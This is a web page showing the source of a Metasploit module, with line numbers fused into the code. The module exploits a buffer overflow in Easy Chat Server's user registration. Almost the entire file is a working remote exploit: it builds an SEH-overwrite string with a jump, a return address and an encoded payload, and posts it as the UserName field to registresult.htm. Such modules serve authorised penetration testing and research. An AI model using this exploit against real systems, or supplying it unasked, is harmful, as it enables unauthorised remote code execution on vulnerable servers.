Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/http/easychatserver_seh.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = NormalRanking89include Msf::Exploit::Remote::HttpClient1011def initialize(info = {})12super(update_info(info,13'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',14'Description' => %q{15This module exploits a buffer overflow during user registration in Easy Chat Server software.16},17'Author' =>18[19'Marco Rivoli', #Metasploit20'Aitezaz Mohsin' #POC21],22'License' => MSF_LICENSE,23'References' =>24[25[ 'EDB', '42155' ],26],27'Privileged' => true,28'Payload' =>29{30'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",31},32'Platform' => 'win',33'Targets' =>34[35[ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],36],37'DefaultOptions' => {38'RPORT' => 80,39'EXITFUNC' => 'thread',40'ENCODER' => 'x86/alpha_mixed'41},42'DisclosureDate' => '2017-10-09',43'DefaultTarget' => 0))44end4546def exploit47sploit = rand_text_alpha_upper(217)48sploit << "\xeb\x06\x90\x90"49sploit << [target.ret].pack('V')50sploit << payload.encoded51sploit << rand_text_alpha_upper(200)5253res = send_request_cgi({54'uri' => normalize_uri(URI,'registresult.htm'),55'method' => 'POST',56'vars_post' => {57'UserName' => sploit,58'Password' => 'test',59'Password1' => 'test',60'Sex' => 1,61'Email' => 'x@',62'Icon' => 'x.gif',63'Resume' => 'xxxx',64'cw' => 1,65'RoomID' => 4,66'RepUserName' => 'admin',67'submit1' => 'Register'68}69})70handler7172end73end747576